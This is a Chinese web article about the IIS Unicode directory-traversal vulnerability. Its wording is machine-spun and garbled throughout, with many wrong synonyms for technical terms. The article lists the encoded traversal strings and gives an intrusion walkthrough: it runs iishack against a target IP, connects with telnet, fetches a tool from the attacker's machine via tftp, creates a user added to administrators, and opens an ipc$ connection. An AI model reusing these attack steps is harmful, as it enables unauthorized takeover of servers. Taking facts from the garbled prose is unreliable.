当前位置：首页 -> 网络安全 -> 基础知识 -> 不要小看IIS的恶性杀手Unicode

不要小看IIS的恶性杀手Unicode

时间： 2021-07-31 作者：daque

iis是“internet information server”的缩写，微软公司的web效劳器，是windows 2000以上司别操纵体例自带的一个组件，经过它来实行web效劳器的功效。

　　unicode缺点是一个特意报复iis的缺点，unicode缺点是最简单让侵犯者顺利的一个缺点，不妨探囊取物改掉默许网页，重则简略硬盘上的数据，能手以至不妨轻快获得administrator权力!

　　因为windows nt/2000操纵体例的普遍率比拟高，以是很简单使它变成很多黑客报复的目的。暂时，windows nt/2000最重要的unicode缺点所有有四种，辨别对准各别谈话的操纵体例。辨别为：%c1%1c、%c0%cf、%c1%pc、%c0%9v。比方第一个 %c1%1c 的题目。c1 1c，华文简体内里没有这个字，依照平常的情景，按照内码变换文献\winnt\system32\c_936.nls会源代码成“？”。但对简体华文版iis中 c1 1c解码成了（c1-c0)*40+1c=5c=“\”。此源代码爆发在iis检验和测定处置路途串中的“\”之后，以是不妨冲破iis路途考察到上司目次。

　　被报复征象

　　黑客普遍都沿用iis hack报复法举行报复，然而须要东西“iishack”(注：iishack.exe是报复nt 4.0的，iishack1.exe是报复nt 5.0的） netcat和tftp再有netdde。

　　普遍侵犯者的报复手法是如许的：

　　开始，将tftp装到呆板内里，将本人的呆板形成一个ftp效劳器。而后，探求到nt呆板的ip地方来举行报复，比方：192.168.0.10。

　　“c:\iishack 192.168.0.10 80 99 ”

　　即使表露报复胜利的话，黑客就不妨再输出：

　　“c:\telnet 192.168.0.10 99 ”

　　不妨加入到“c:\winnt\system32\”内里，而后侵犯者会运转“c:\winnt\system32\tftp -i <本人的ip地方> get netdde.exe ”而后再运转netdde.exe文献，创造一个账号，将它的权力提高到administrators组：

　　“c:\winnt\system32\netdde.exe net user make love /add ”

　　“c:\winnt\system32\netdde.exe net localgroup administrators make /add”

　　而后退出来，用“net use \\192.168.0.10\ipc$ love /user:make”创造ipc贯穿以举行不法侵犯。

　　被报复的呆板，侵犯者不妨运用缺点窜改网页；简略硬盘上的货色；创造代劳效劳器，妨害特殊大。